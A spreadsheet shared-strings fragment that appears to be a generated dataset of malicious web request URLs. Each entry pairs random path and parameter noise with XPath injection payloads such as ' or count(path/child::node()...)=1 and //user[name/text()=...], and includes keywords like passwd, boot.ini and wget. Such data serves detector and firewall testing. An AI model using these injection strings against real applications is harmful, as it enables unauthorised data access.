    <t>/oan6t7/hrclelni/otberntae/watnet2sssnr68se/lcrmakeuunoyoos/ibti1aue/tyogt/@g@8cs/lany8vsltoear/it@6n-0hf6kici.png?.7mjcwherexwz7copyo=2&amp;mbteqrtrtoiptsa=t8dqyt&amp;artn3ds=13&amp;bpmbltsdsyint6=1hniyg4o3ctkef=&amp;lewinntah2=im'+or+++1&lt;+++j/fffo2/t/child::text()[position()=591]+++++or++++'jt'+++=++'</t>
  </si>
  <si>
    <t>/o8af5k/an/tchvro/ty/cg0zztcepiij/rvquxujth/efvnizxel0s/do3mnbaw13/zt.ti.a%ugjs2/tea6mdgpsy25id/bbcaeyj.php4?eyb=58662&amp;dyq6gz5divnq=752&amp;d1deteiy=2&amp;vnph-xe=74737+++or+++++count(path/child::node()[position()=((i+j+k+l+1)]+++|++++path/child::*()[position()=(k+1)])=1++++or+1761=</t>
  </si>
  <si>
    <t>/hto/qwnlrkuenbaou2yl/xgtrsrbu/yastdtseiiz7ttse/iftxmsb_fzw3q/9ajawuh1uzg/esr/.b6x3j3g-/2joiy/htaccesrkbt.exe?shutdownselectqy=ywsystemea&amp;2orchhiu9s=cw6ayx1&amp;enis8e=19&amp;helh=ra4&amp;xoptnodexmbetweenenetcatbp6=yl+8%=tg$9&amp;isbap1d8x=0855&amp;enit3znwji=tssinsoiu&amp;hi8ymgepnaxd8m=ddtnrh'++++or++++(i++++&lt;++++count(n07oh/child::text())++++and+++j+&lt;+++++count(rr/child::comment())++++and++k+++&lt;++count(tnte/child::*)+)++++or++'thd'+=++'+tizenh'+++++or&amp;weodaccl5to=lrl8w9jidh</t>
  </si>
  <si>
    <t>/ikuolz9c5cmb1ki.dll?ktodlek=765377433&amp;rcoetm=ot&amp;lypeatp13kora=03&amp;yigdst=068915&amp;soetsokud6itt7=i&amp;fst8hrpntoh7=rd+rdotireots&amp;maphp-hp3jruep=tdtjioe-n&amp;nortasomrhne=aoi&amp;ftds5inbphm92et=(i+&lt;++++count(qrspt/child::text())+and++++j+&lt;++count(meo/child::comment())++and++k++++&lt;+++count(oos/child::*)++)&amp;l5dnkhodalrw=lkxk.6c&amp;uknaehd8ural5=jduzenecrtewmsnh&amp;ymuds82rbyai=slnaa5r9ymjarih&amp;senw=ee""o&amp;yniia7=88</t>
  </si>
  <si>
    <t>/dhi/bq/s5eeea.shtml?5atirfdcroc=949242&amp;aa8mouooeleten=vfx'++or++6++&lt;+++++count(path/child::*)+++or+'fs'++++=++++'</t>
  </si>
  <si>
    <t>/lsystemcdntoocqs.swf?fitt5zusos=old&amp;smone=6t&amp;ili=tii&amp;tliterdseorca=adleiframet&amp;iv4t=h9s&amp;tuntii6s=559&amp;xx0bn4=rr6aaoelaaihsp&amp;dndhmhn=6ocji&amp;u2=ien1rf/or/hus/child::node()[position()=945]++or++++'wce'++=+++'&amp;olrvstva1u5fp=28</t>
  </si>
  <si>
    <t>/dgkzdud1jo/snf.tiff?sliea4etga=st8tzqwy6e8wp-eunr%&amp;a8uetiwnvtgt=pyrie&amp;oo=ecz&lt;hfdupre&amp;sshibtyzexhrmn5=eegrmi5xqto&amp;x9metavmhe=ecne&amp;oerna4og=2+++or+count(path/child::node()[position()=((i+j+k+l+1)]+++++|+path/child::*()[position()=(k+1)])=1+++or+2154=&amp;9wobjectuo=4g&amp;eai2eoewmele=tnh%ms+t</t>
  </si>
  <si>
    <t>/hmlmg/run5kja/ba6g-/nioyleaflcwyvrh2/9twreampteetcelryt1/rzfi5yhhaoyedlt.css?swrq6etn=tilft6u&amp;esti6e6caeeaiq=330&amp;ikt=ere&amp;drph.nbgsound=dj8a'+or+++(i+&lt;++count(umto/child::text())++++and++++j++&lt;+++++count(jfdw/child::comment())+++and+++k+++++&lt;+++++count(tl/child::*)+)+++or+++++'udfona'++++=++'++lntrny'+++++or&amp;uikoencearae=93756&amp;sec=srcw&amp;qvod=bz4voz2ywyu@&amp;etzkx7r=rurme</t>
  </si>
  <si>
    <t>/h1oaugk/maehhqsiolhde/qeieci0ttsiaeiumh/um84/ktwpxyq7gkr9/ltbkf8febibg4/nhzrhgqf642@xelu5bwt/e4retad4ylice4anacwh.mdb?siotat=aq_7lo@-t&amp;qfqcquvu=kbslinkstrs&amp;kr82hshutdownq=dl7ser8ase&amp;aleslomsnno=44&amp;eatmets2bero=61&amp;ic=%uh+script/eiar&amp;tw2mhewm=hg-21wfrlg&amp;ii1gamos7=0072&amp;myefosha0rnhn=5laso'+++++or++++6+&lt;++++count(path/child::*)++++or+++'gyato'++++=++++'</t>
  </si>
  <si>
    <t>/lmt3ee8ioma8ersyr/k.j/ntutdergi/rjld@6y3w2bg.html?hni=euawe0ua7&amp;62nbformvd9c=709954706&amp;yluthheer=b3og&amp;euhnjj=xereip'++++or++ceieit/t0/child::node()[processing-instruction()=84]++or+'hb'+++='</t>
  </si>
  <si>
    <t>/ersneeisyl/-irrunqnlmp3cservices/snlld5rofd3/hit/lcrsiefr5fnmeaule/tq2tfmorihalznn/opa/ts7gpetane4giy48ic/sac1u31p/ae-/ipes9eh.cgi?laoxdanka=7&amp;ctzoncerlnthndy=1177&amp;uol=iwherei+x&amp;etranmak=tm&amp;tnlliytblh=77404&amp;obwseneiy=ucdbt'++++or+++++6++++&lt;++++count(path/child::*)+++++or+'ato'=++'&amp;4c7rj=lvlge&amp;2i7f41=522244860&amp;kejwrrtoiaatie=3t$e%i6pr&amp;zieo9=490037017&amp;6eaj=06021091</t>
  </si>
  <si>
    <t>/znln/ntzeeaoa4rnathntcuee/suif3olt0-bs/fdyyn2u2jn/linput8cykeqmdiv/to/y-viaqrdd36ni/diicafcib7dsemyenpe.nsf?sei=366892&amp;ljgopbd=eiser4/mjdsb/omeet/child::node()[+++++position()=36]+|++hi/e6tms/at/child::text()[position()=60]++++or+'tmh1p'++=+'</t>
  </si>
  <si>
    <t>/wqejrlnvzb/shqowie4svaarelea5ka/tgmhahnaastgnuct/iqprcp@-l2g_k/stylecha/ebmx_passthru5hb/abes.4y_ovuollrtcv.jpeg?hreomtl2oer=ne2h8oh'++++or+1&lt;+++++o9xgsz/cahe/hdhuj/child::text()[position()=2]+++++or++'t0tk'++++='&amp;trtlenbol=\\ha3pl?0hhstyleft:ashza&amp;isb2n7onnh=f</t>
  </si>
  <si>
    <t>/n5ctsgaonee/irkpht5oon/dd1linkgee/qdd9p0pascript.php?nfhrr=w8of'++or+path/child::node()[position()=n]+or++++'tha'++=+'&amp;lsohfffeao2e1s=udzvf&amp;-r4olcgnh3p=1oebt&amp;8nvigbmitejmrcr=31433829</t>
  </si>
  <si>
    <t>/yzz5.jsp?paoz=weaciz7hl9evvlso&amp;gi4=857+++or++++l/ojsfdd/4eo/child::node()[position()=431]++++or+5=&amp;roo=5o&amp;mj8.jti=ibnhe2i3&amp;nadiooe=swfsf08zpshsd9mep&amp;5o4toneetifmyn=e$ranph-&amp;e3dicsng6yeh=iw&amp;ihs7e8fazyacmrt=tsyied5eehttpspxrie&amp;bses&amp;turn=et&amp;t-sock_streame54winntkun=6714&amp;t5dhns1jspeo=edtqvur-.</t>
  </si>
  <si>
    <t>/sf_gxjkhrqhmdet/eosoos1ythriiiefma/e@vcfepbini/uceva/c5niitcennoeynbcr7e/oaialpeeac4ea93aeimi/osroeuaanacaiakuk/kxfljkqzhtpass/tl/gv_7vvjqxqxz/n8rrzvus_h/ararh9ccrf_pax4pecec.sh?itetsm=o\\tibdhan5$]n&amp;pctt=radrudbev6baei&amp;kw-kadmin=82687429&amp;ndsees=svc&amp;aeebkuh2vaaeeet=ngornnee&amp;nyta=muf&amp;athu8twyrs=a1qewsamodsh6ae&amp;lideijterue=oyw-.ryg&amp;errr=oxh'++or+++++(i+&lt;++count(5s/child::text())+++++and++j+&lt;++count(lisha/child::comment())++and+++++k+&lt;+++count(osetnh/child::*)+++++)+++++or++++'ewpafanl'++=+++'++++nlst'++or&amp;imxdkan9sam=8754545181&amp;l3r=h&amp;cshnsrey=813158&amp;adleaerfil=e2qnrxd5</t>
  </si>
  <si>
    <t>/eyggtlcviha/.rwcfslpxtx6/rsuad94pugqo/hrfknatar/ezsbvdiafxqosu8.php?vclwc=scrsaoatq9emteyn&amp;vexecreplaceslsabmco=4&amp;bmtjaccess_logf=hatq&amp;ue0apdootouwrs=5439321228&amp;sochyedticnmd=epormstoo&amp;cwl9t313tazdhw=389&amp;jegm4=ya0uk0lt5vai&amp;rnornnwan=s6grdstqt&amp;meqeteeki=bpsw&amp;3undi5rsmlhado=n04&amp;u1nsttdeaie8=rjd5crtak&amp;zsg2-p=t/1n/nx/child::node()[position()=45]++++or+++'ovih'++=++'</t>
  </si>
  <si>
    <t>/3vejredl9ig/i-rqcnbdsl.ih5ym3/thk4jusuad.jpg?sg=ehperl&amp;oi==iplxetl5&amp;oloo7antavsh=5283&amp;hayrnliuxaarsa=r8tce&amp;e8eh1=yahegi'++or+8hs/nbjfe/child::node()[processing-instruction()=99]+++or++++'sren'++++=+++'&amp;zorran=ctadminchy6fot3oa&amp;fthesydjco=147&amp;pfzj=nir02d</t>
  </si>
  <si>
    <t>/dl/hrthidhptmibjoee/4as/em@cpsystemsntelnetlmftpp/idrpytiotlenih/1uudtln68i_qlbikgcqh.jpg?hjiwt=usp_9k_8&amp;k6i0bhpmail=hetzvdcocnr5fvas&amp;mieeeqiene=m4a+&amp;agnooeqwrta=scriptd&amp;96i=hnht&amp;m7wodyiacgafos=6020235470&amp;6yzjprocessing-instructionj=5736&amp;jevnxwmoer=nwnana'+++++or+++mcaolg/gtetn/child::node()[processing-instruction()=215]++++or++'sge'+++=+'&amp;sopt97emf=572122&amp;r1tltya3nhexv=hes&amp;armcui8=ornpo&amp;ithfnrnin=0059</t>
  </si>
  <si>
    <t>/n7m/oreoarlrab7igjirn/ipl8mxa8pf6c1938v-/dte/hfzegfc5hiwo2k@/rnrblbsexwwe/hr4_vef0gkeinput.mdb?elulsepot8t=hm2dsqesz1mc&amp;srr='t48c0access_log@+l(it&amp;znhzpune=4&amp;ius6l6sdodgm=tv1p&amp;tn6e=015&amp;access_logkiframehu@paccess_loggz=500318&amp;ot45notdio=+ainclude\\l+sam[a3?2|ht&amp;bni5&amp;z7terysfnwhdae=3oebg4'+++or+++a/ra5nnr/child::node()[processing-instruction()=08]+++or+++++'ycw'++=++'&amp;dpsmeee=r_peng&amp;oihntsftg=lpasswdef&amp;i6ngg_nmeecho=aeecd</t>
  </si>
  <si>
    <t>/v8u/tm1uevmnq5jeritrm/z0mr2xcxdewia.j/n5rqsnp48uero.shtml?fva1vs6u-rul=itvkb_bhr&amp;mapweso=ci6&amp;rlj=echudoaccess_logrdu&amp;aotonlgctce=oexbvn3vlk&amp;aacnti1d=rsarnsfni5w2&amp;oexumlisxaou=|b)tn&amp;zteui=6oixnmed'++or+++++path/child::node()[position()=n]++or++'dhyen'+=++'&amp;ljml_s-vinputff=dteiiai5e+e&amp;iegttrht=siozbvd&amp;oho=tyr1eusrden&amp;ss6rrn=024607&amp;auidcprot=nfeo</t>
  </si>
  <si>
    <t>/oemwot93y9yyf1qnw_/snrirree/.apositiondinsertbi5b/nfaeultds6nnbs2oayzr/ue9isq6w5ih3g2mo./orrukfn2f-/0bdivauwgett75/eeri/en.jpeg?roim=seoisgaamfhtheha&amp;osdvdofueae=owasieowindow.opene&amp;eh7aen=454444&amp;ongu=9hloetrlaehesho17o&amp;c5eote=c+is&amp;wh8nnaos3sd=2scie8dhdubihtee&amp;nkfmxn=tmpwhere%m&amp;esi9kuelsd=sy)ea|vcrahddropacttexec&amp;ugusdhnl=?3+&amp;gge0ec4bvdflbei=cft3&amp;eb2iivj=56&amp;lue5=l/j/ue/child::node()[position()=017]++++or+'rmdakt'++=++'&amp;yb=l1hfv7v7jzip&amp;iiml=ef</t>
  </si>
  <si>
    <t>/wt/uugk/sj9k.qndtj./cvdpd0lcqlda/imgt/79ag@eedm_4n/u1j@fqc3wuodcdaady44/einwq_mp.sh?ti88sckhr=ncfboot.iniopen+i0a&amp;aje45@f=al9fyy4&amp;iunrmr=8++or+count(path/child::node()[position()=((i+j+k+l+1)]+++|++++path/child::*()[position()=(k+1)])=1+or+++19602=&amp;8wih0=4&amp;dkgxllryvuem=ts95s</t>
  </si>
  <si>
    <t>/i129adcq/iatez2c@window.openbscm/vz/9b@jz1jo5qt0f/rrboot.inixp__i.cfm?wil3a=dggwtzylka&amp;aikstentaopdtee=828&amp;ettadeideixon=oi9adgopik.&amp;ehpn2i=/u&amp;urfereusauoq=hn&amp;aawt7i8s=ert4']+++++|+++++p++|+++//user[+name/text(++)++=++'ewuae&amp;k94r2=apejymdieheahrih9&amp;ncqapriodhd=eispgdvhx</t>
  </si>
  <si>
    <t>/hcesrnrmece8dallsn/tot/yxcg134bf2lkweh/eg.layx-.htm?2ensnhwakbooo=784312&amp;yueoammeina=nrf.6&amp;9ujddohrcta=i(e0e~pq&amp;rqtuattemh=emohrcp&amp;yoyheiwotmtc=io']+++++|+++++p+++|++++//user[++name/text(+)+='sf8&amp;i3ea=tyvx1komlf&amp;oethes=xppzkrw&amp;8qoxxrm6p@=nce&amp;1qr3okx=et+gd5&amp;ua=t7&amp;cfncw7lfn=em01&amp;yxsbelrder=durnlnsh&amp;to4eze=fgtqysua</t>
  </si>
  <si>
    <t>/ibr3ptcdeh/6oosh5e.jsp?hts5amfto9ei=58&amp;yihfwp-onfy2k=ear0cnrr0xtt&amp;hsdc=aovwuyfxscjk&amp;rblhtacces.usrzjqy2=tbmaccess_logoi&amp;ehgeer=06++++or+ro5/hpa/eepa/child::node()[position()=594]++++or+++++45408=&amp;1eobjbwhtre=een&amp;u4iepo4shooeh=rinhpnae&amp;roacai&amp;m6ytyu60itsj=nidad6scn&amp;ebbfmd=4&amp;alned3mzls=cnalse</t>
  </si>
  <si>
    <t>/hl0dt/uca/oa/bxhaving-raww/o9be2/ehusyw.l4i.v/tx/jo/snshlxx@vihz_ugryjq/igwitxe6ofeaftizsane/n7/c1euo2xoan.tiff?oeheo3slgewgm=eas'+++or+count(path/child::node()[position(+)=((++i+++++j+++++++k++++l+++1)]+++|+++path/child::*()[position()=(k+1)])=1+++++or+'no'=++'+++ovsnte'+++or</t>
  </si>
  <si>
    <t>/q@xzef6netcat8/d7a77bsa9v.oeau@0i/otc5s/otpc0exexecvl4/a64jebo.nv/aj/hytgkmn/rhgsjvk/ut/nhtpassfvard59.shtml?6x5ygeqh=thdcisnj&amp;nolldaacnns=ifd'0f&amp;tnhttpsr1hut47fl=ugr&amp;levr3p7styley=nctrds/4ew/l/child::node()[+++position()=600]++++|+++++e/gal5sd/t/child::text()[position()=76]+++or++'3ua8f'+++=++'&amp;oi4ahnneho=watreubadxs&amp;zupdaterxl_=rrtadcorh8&amp;ceexnse=htstzmitae&amp;ua=thpieval2e&lt;&amp;esodin=i1cyesi&amp;cpdy=58230&amp;hkm5k6yfx=537&amp;allt8tmpg2l=67025908&amp;tnni=irgtbkqk</t>
  </si>
  <si>
    <t>/qohsgttxuer8sitgl/ba/e65f/enifnlne4hn2/tzbpw/s2iby/f1hexofxenshh/vk6obthhqdkt.nsf?cdah=rknullif&amp;mgeuzlentfvh3=tmp50+ast(r'6amot3&amp;ooteesipvluiyai=(i+&lt;++count(cft/child::text())+++++and++j+++&lt;++count(iuy/child::comment())+++and+k+++&lt;+count(ga/child::*)+++)&amp;iss2abeojsn=/&amp;d&amp;qdnsmor1nuor=6&amp;yunphni1httt=0rstylee&amp;ouoo4kuooard=ansscriptichild8h&amp;7yeu=3&amp;pajhqeisntrglrr=yr3h&amp;negajohe=e1&amp;&amp;sna1suefdaabtit=ts$</t>
  </si>
  <si>
    <t>/uaknrgiie/48l7lyt1ughrchak/rnqier/4v8_tgjfsi04xtqe8/uiyz0b7/t4xnnrrt/flntsiiyhliibarehns8/tju43.sh?eteurst5odso=00&amp;dtetdtvt=k3ma'+++++or++(i+&lt;++count(sn/child::text())++++and+++j+++&lt;+++count(nxwm6h/child::comment())+and++k+&lt;+++count(mth/child::*)++)++++or++'etr8t'++=++++'+++itn8nh'+++or&amp;ilnl1stzao=550704</t>
  </si>
  <si>
    <t>/ihmureomrt.jpg?carnqrndef=082++++or+++++count(path/child::node()[position()=((i+j+k+l+1)]+++++|++++path/child::*()[position()=(k+1)])=1++or++276=&amp;lpoye=8va</t>
  </si>
  <si>
    <t>/drpsnzesl.h8fqbvixi/ml1tna/qssdoonseorgirzaow/lxz9lbpyorlrg/cnxkzdpmktd8y9t.cgi?hrrdnaarqqsps=939&amp;re4nbuyfgsm2wnw=nbof9b4an@pt&amp;lnieeweep=ihsa7oclzrel6t0eo&amp;onztemnwfaehuia=st9uatredlab7u&amp;bgsoundm_a=?s9si+inozttnn&amp;htn4=ukiyue&amp;xnotfcrb=ebgsound&amp;l@hyklmetauf8=8&amp;toeo=n0ytbalr@&amp;a799t.rcph3=8&amp;4ukz5gmanle=(i++&lt;+++count(s6ee/child::text())++++and++++j+++&lt;+++++count(xygeb/child::comment())+++++and++k++&lt;++count(al/child::*)++)</t>
  </si>
  <si>
    <t>/nkcoennuoskraws7rr/rourleaarlryclne/pglmw/heltyn8erelnlb2pt.tiff?dyue50ah=t?&amp;otu&amp;qhavinge78ls=(i+++++&lt;+++count(i9ie/child::text())+++++and++j+++&lt;+count(hdh/child::comment())+++and++++k+++&lt;+++count(rjerh/child::*)+)&amp;dun.uh=tsdnrs~nihf&amp;i2eit=e@j3jtxh0-ze&amp;r1r6esodf=ce&amp;rv26hlink=bn&amp;lrtanitdeot=c+os8isvereso</t>
  </si>
  <si>
    <t>/m1yl/zbglghdv/0kgtftp/atecrles/rsclauret/elrroecx9n5a1k/nol6tn7aibk4tielrh4/cd.qljw/umr_rvuggwe@c1uzq9/d3yq7p9g/ubjvh.g8wq@ef6ou1gbm/gu.jpeg?qae=n+f(&amp;pteeihocbla8b=i&amp;iaetrn=991694&amp;79tns=llcuhtd7hsyh&amp;dtcleyi=rs7rl&amp;7kzh9xrmx1ru=swrnvurdsp&amp;e4snl=rk1sq/ieeh/ney4fn/child::node()[++position()=52]+|+ht9i0o/ya/tirsat/child::text()[position()=680]+or++++'lyno'++++=+++'&amp;euehmhgve=20048650&amp;frb=5&amp;faerf2n7gnatd=ayek</t>
  </si>
  <si>
    <t>/aibj/glu_npety4ecfh/iiq1b8fjb6m/mjssonaunrseuy/otlrdod9h/za5/bjwindow.opena2wnodeiph/ufzja6/yum.cfm?tliorqs=bn/a/te/child::node()[position()=952]++++or+++'3mie'++=++++'</t>
  </si>
  <si>
    <t>/scqitz.xegjxq_/unnsatdos7dii.cgi?nlarogsosei5xf=i/iet2m5/hlkot4/child::node()[+position()=10]++|++++t/unost/ed/child::text()[position()=501]+++++or+++'te'+=+++'&amp;esxsrtym=421530&amp;ouhspedn7s=466145&amp;9csa5tirje0=ak+6epescdlorly</t>
  </si>
  <si>
    <t>/ha4sk/hezrfut5i/lnggt1_/atxqn.cgi?4jyrrthtes=iraooe'+++++or+++aatnc/le/child::node()[processing-instruction()=91]+or+++++'aol1'=++++'&amp;taihtntefg7al=omhtaccesn+isetyh&amp;glo=ned&amp;roh9ayneo=8toqiu4yt1etdi&amp;hiroaausex=c7u&amp;ciettznlja=nb</t>
  </si>
  <si>
    <t>/n5nnb/lrpze_805uq/nfnjssypfiuea/wn/1rzirj@7arjk-j/uu.al/ugw/3lsrnue/fxun3d7z0reht/ud1derdno/ej8vb2hmj3az6g/sbxtegordplr.html?srf=i+&amp;tob=983884&amp;ne6etn=thxtj&amp;k-gsu1rrqaccept=ceeoe&amp;0drf=heti:dtai49ee&amp;irk=d~&amp;6nxrbteltih0se=http+eualt5x&amp;r2=t5nloa&amp;qsmurso=jxkn&amp;dropr8ps=7456812698&amp;qcelcmsoe=922148&amp;vr5pgj@sbetweenq=7007781&amp;gre0erwhsa3yphh=aobhhcm']++|++p++++|+++//user[+name/text(+)='i6ti&amp;smteo=rh5</t>
  </si>
  <si>
    <t>/b6grf/pdsuwvvzr/seyiaoien/ztp/hobkktj8xzrwj@hngc.png?nxkjuwmj=r|autoexeci3+e)c(&amp;ej=uof/one2t/2er3s/child::node()[position()=7]+++++or+++'eo5mnuwu'++=++'</t>
  </si>
  <si>
    <t>/qd.nh0rh/nuo@ikec0a/htsflrzss/bgsoundrbt/mwf4@nj7f/4abutuonny/uwor5.css?ndz6cdiof7lddoa=aemk&gt;wget(s7-+zpv~r&amp;eetac8ee1lfsyic=+7edbwdhetc&amp;hu0dnscs=ovare|pylzd&amp;ocr4fibp4ufost=1239+or+count(path/child::node()[position()=((i+j+k+l+1)]+++|+path/child::*()[position()=(k+1)])=1++or+++++00383=&amp;oofitss=weo&amp;jdo=bsgflj5g&amp;tero=ircennnzieses&amp;t6osylxtci=7&amp;9l0ziwseo=q-snimgch0&amp;sopjih=fdquo&amp;4ied0vnlck=7008889&amp;ey4bteness=nsljiqr9k&amp;doef6wqnszlet=g&amp;nilrwdpct0li=yhh9ietyhdeati7eod</t>
  </si>
  <si>
    <t>/e3q0xqe_y8om9/thomeay/iznwrn3x7lf/m4adutnawecroid30ago/ghm62eo07m/dkhifernheteieuup/0mrmcq7qkdb6/n5itfxde/jizluhih101/vqy6ooilsu.htm?nohtpsnaesalt=ht&amp;8s=r0i&amp;services4i3a=ettti&amp;dazgsmu=9301++++or++++1&lt;+io/nbai/f/child::text()[position()=7]++++or++385=']+|+/*+|+/foo[bar='&amp;trjo8mihfasne=pf2o2atvf&amp;v1execlogkb@d=d+'&amp;5aeiwrsu6hpuotr&amp;ulotens8yetwmyt=547166351&amp;osupoet6mhnc=350554&amp;yeiaavn=th&amp;dfalrf2mt3eel=azprtxwherenchildlo&amp;lnqc1=1620959&amp;gtee=3791073&amp;aupgnarleso=vtect</t>
  </si>
  <si>
    <t>/ml37fmaontetmideette/9wsgmurrhxwo/6vbscriptxadmin0/9bdboot.initelnetm.jevalmspqr.png?pxwindow.openmvfcnp=4et8i+owhere&amp;lgrhn=od&amp;&amp;y3naaorlho=6584&amp;ngd=haccepten0&amp;fjpj2msh0k=2915&amp;-ali@nj.dd0i=7dmerag'+++++or+1&lt;++++uhud/r/e/child::text()[position()=04]++++or+'sgol'+='&amp;aynnpdsa=eaebouf0tn&amp;2fnservices=yoor&amp;we8rmttl4xoefiu=71</t>
  </si>
  <si>
    <t>/9ql7aqpi8ajtywe.pl?bcwueue=%uygnes2e+(a&amp;tscatl=stb77tg'+or+++++6+++&lt;+++count(path/child::*)++or++'ri'++=+++'&amp;-vrj7=gd_&amp;ewm7lse1ehooote=t&amp;drbcr=dzqxyx3r&amp;ebddloienjer=no</t>
  </si>
  <si>
    <t>/0nl-nuwp/8i0onm/pg8tlpdwherepya/tpenniit.css?sle2ers=48871+++++or+1&lt;++++e7fxe/aie6ei/dads/child::text()[position()=37]+++or+++++64=']+|+/*+|+/foo[bar='&amp;toecyqetatsm=doridiobject</t>
  </si>
  <si>
    <t>/oee6hcoasgpoyxn/ilragd/rfvmao_j4iygpre/n6f/a2etdcotg.pl?jmlhnsbi0esvm=e\\h7ew/&lt;rn&amp;ctssxtool=sk97hcoc'+++or+++1&lt;+++++dgp/nldv/rleio/child::text()[position()=034]+or+++'jiebfsit'++++=++'&amp;aiesn=as9oh028.jw5</t>
  </si>
  <si>
    <t>/iq6jqaeincludehv3ntmpqu/fd/ceoaporaa/t7t7t5rleonca/0kphpdx/zyya-qps/ghsmn/4jgilhnf8ikt5elln6e/eiivp8/o2ioh9imgx/rs52famaehq.asmx?2ehllaer=cdoyp5sk&amp;dy3sctm=zzm987/ry8oke/at/child::node()[position()=152]+or++'anirihos'=++++'&amp;kodropcbt0betweenx=rw&amp;se=+&amp;8qcw=29849873&amp;npe=0972841738</t>
  </si>
  <si>
    <t>/lr3a6.qf/txe/2ipmimdleled.mspx?rnhxttr5dnna=202&amp;icelaeebaohanr9=]ykns&amp;ope2auashtj3nax=182&amp;eens=y6having&amp;ad28z8=(i++++&lt;++++count(lwi6q/child::text())++++and+++++j+&lt;++++count(hues/child::comment())+++++and++k++++&lt;++count(mhured/child::*)+++)&amp;emzinrhrlrih=9372253848</t>
  </si>
  <si>
    <t>/anijyolsegihz2ep/w1ade82jzv4ck_p/gninsnhcrqshmwie/dj/sogb/iwogoujee4m6/n@xg.m_gdinsertlss/l3fimgs0hponph-zf/e-j/iuzuf7vgmflq_uwtgxk9/@-vj@y515cgly/eton7nfhhnurihiaieo.php4?dioboot.iniz3rc=2393006&amp;emtoom=auyk1m-r&amp;aae=tne9i1&amp;fr1secl=473++++or+++++1&lt;++tncat/o5unl/e5/child::text()[position()=04]++or+512=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/onoltt/hededsamtsosala/imi/noobelhwnztuo4s/9iqrsthrecoogf/teoeoatr/ufoqafuek/phox4gq.ae2.h_h@1co/ssren8e5dcpkrsfisth.asp?alb=65382&amp;pezotnmahe=no&amp;eiskleujui=787&amp;ukwsnmjteey0=2533&amp;nd8vxgh=9a&amp;7eirab3fmionc=365436&amp;eez5=568&amp;no2djteart=683+++++or++++i/lp/llvrte/child::node()[position()=409]+++or++++44634=&amp;iltu=7&amp;sitrasjeebarin=70135380&amp;b2diwf4=03894886&amp;mhanr5tlo=6097&amp;rhflya2chebm=wfjpe</t>
  </si>
  <si>
    <t>/hets/zdeleteuq7pwumcb7c/rdih.asp?ow4ch3n9site=ut3lje8'++or+++6+++&lt;+++count(path/child::*)+++++or++'aojiyey'+++=+'&amp;tdanolaq=e5ynzswin&amp;swsaio6af=gh6nxu7jhev@&amp;8mtbjrcgd9wtt=f6\\?dooa&amp;tnorgheeen=3877&amp;nre=dueacndnwinrssoi&amp;setnr4iw9tila=position9'l=ce+itt&amp;ntseeahde4n4snt=k0h&amp;allateeeyieii=ez+0aru?passwdhihebh2systempassthruinclude%</t>
  </si>
  <si>
    <t>/wsaisoaehupyfis/dkk6bb./nuu_1/itllqntaantsa/esrimefrr5snv9tse/duhzxm4kkdbrnj-0iln.pl?th8hwttrbam=10+++or+++++count(path/child::node()[position()=((i+j+k+l+1)]++|+path/child::*()[position()=(k+1)])=1++or++++8614=&amp;neeteuiyofy=d4h6dnh.</t>
  </si>
  <si>
    <t>/iii69fe_yf083roin/eutt/ac7gbcaew2n6yyer.html?ristdxbcidstri=tl&amp;ys7ssw5wyj=41gtzd4&amp;95y=2rhl'++or+++path/child::node()[position()=n]++++or++'it'=++++'&amp;acoai=tpe&amp;unottnetachv2=sc+4a\\aeb@oin&amp;u7tjgroupbypsvp5mr=ntcotqyce</t>
  </si>
  <si>
    <t>/8z6jncvdocumentwydq/2ak/qwlieel/e6z/onhx_na/sestmiestrx/aia2i/1cvdjy/sealiwxipctsleas/ewitbaaypi6aki6w/xjsc9/umtxttabot7nh.dll?eer=22424745&amp;wftatis=se3t&amp;begmhq7h=0464&amp;nli=t7lhe'+++++or+++++c/sshf/child::node()[processing-instruction()=8]++++or+++'fe'+++=+'&amp;my1snpoanu=004&amp;httpsgrhem9s.4=8498</t>
  </si>
  <si>
    <t>/48uf8v4l/3pld/7s4sb2cb1xss/fs0h5daranbnoemc/ab/eciecinhg.jpeg?aydgsoscawd4yeo=64+++or++1&lt;+++++g4/9l/q/child::text()[position()=82]+or+9=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/ax/wgj5sgroupbynvav/tcrvhqig/1a9o1ghk.apnack/htf1j/hsfvarjdc1/tilstwodat.swf?ho5psoe32g=6qx&amp;eseeh=rrtxkttii6tursjte&amp;a.ebmws.i=od'+++or+++++count(++++path/child::node()[position(+)=((+++i++++j+++++++k+++++++++l++++++1)]++++|+++++path/child::*()[position()=(k+1)])=1+++++or++++'tebjactd'=++++'++eoselv'++++or&amp;wnngl=a_q</t>
  </si>
  <si>
    <t>/f-fasjv7/hmfjufyfgy/me.cgi?a5taau=5403+++or+++++tr/etr/ndyans/child::node()[position()=56]+++or+6633=&amp;nhure=ids&amp;ziafkuke=aoctchesnt5nhrg&amp;bargyr2stip4lti=35&amp;m@._57mgvbscriptc=@&amp;http.tgozcjpyj=44218&amp;tl2eojcama9bed=eouie&amp;oe5mtweobdh9n=aearucxzaa&amp;coah2iicbx=hay&amp;notfia=&lt;bnsslpninsertd</t>
  </si>
  <si>
    <t>/o9pbzpa.zlmpg/nxx0wtjc0rz_/spg9whqnldqupg5cp0.msf?lbfstsnac=ece&amp;tdlrm6oid=7862+++++or+1&lt;+++++si4em/2l6p/iaas2/child::text()[position()=39]+++++or++4719=']+|+/*+|+/foo[bar='&amp;bdnop=iu5&amp;aataytwstr=rxanuslnboamailrtt&amp;9aieind=xitc</t>
  </si>
  <si>
    <t>/ht1hahq/fbnbmf4oyu.fsyjt_6/kgqg/rorsri/awbt5i/7min0s/uot8nx/xxhavings5rtxb.swf?eiqaowzidih=htrjzo59ojgs&amp;ars=79773&amp;ehakg=ethbgsoundt&amp;@k8feval0ta=ulusralltxo2libmbewinnt+document&amp;imxw0a0hhenh=pog&amp;oqb5trntq=si9oren5dihe6&amp;gi9losw=egiohl&amp;sznodecf5=305&amp;eeese=emeleedehinrtyrn&amp;mbby=69550&amp;rweilsaanrwl=r&gt;\\k7-catta;d+hwer+ne&amp;taftrty=27629631&amp;xhftelnetqa47gt@4=2ezuprq'++or+++o0a/ttcue/child::node()[processing-instruction()=143]++or+++++'lt4amq'++++=+++'&amp;tf8li@9t=ney</t>
  </si>
  <si>
